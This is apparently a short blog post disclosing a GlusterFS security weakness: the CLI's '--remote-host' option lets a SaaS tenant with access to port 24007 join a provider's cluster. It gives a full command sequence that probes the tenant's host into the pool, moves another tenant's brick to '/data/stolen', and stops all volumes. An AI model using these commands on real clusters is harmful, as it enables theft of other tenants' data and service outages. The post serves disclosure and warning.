One more reason that GlusterFS should not be used as a SaaS offering
Published: Gluster F S, Rants & Raves Estimated reading time: ~1 minutes
I filed a bug back in July 2013 asserting that a “feature” in the gluster CLI was a potential security bug. I’ve recently had that bug rejected as “Not a bug” so here it is.
The CLI has an option, “–remote-host” that allows you to perform gluster CLI operations on remote hosts. This can easily be exploited:
# From host "myhost1.domain.dom", a SaaS client of provider.net
yum -y install glusterfs-server
systemctl start glusterd
gluster --remote-host=server1.gluster.provider.net peer probe myhost1.domain.dom
gluster volume info someone_elses_volume
gluster volume replace-brick someone_elses_volume \
server1.gluster.provider.net:/gluster/brick1 \
myhost1.domain.dom:/data/stolen commit force
gluster volume list | xargs -n1 gluster volume stop
Since all that is required is access to port 24007, the same port that’s needed to mount a volume, it can’t be blocked and, therefore, will leave your cluster open to abuse.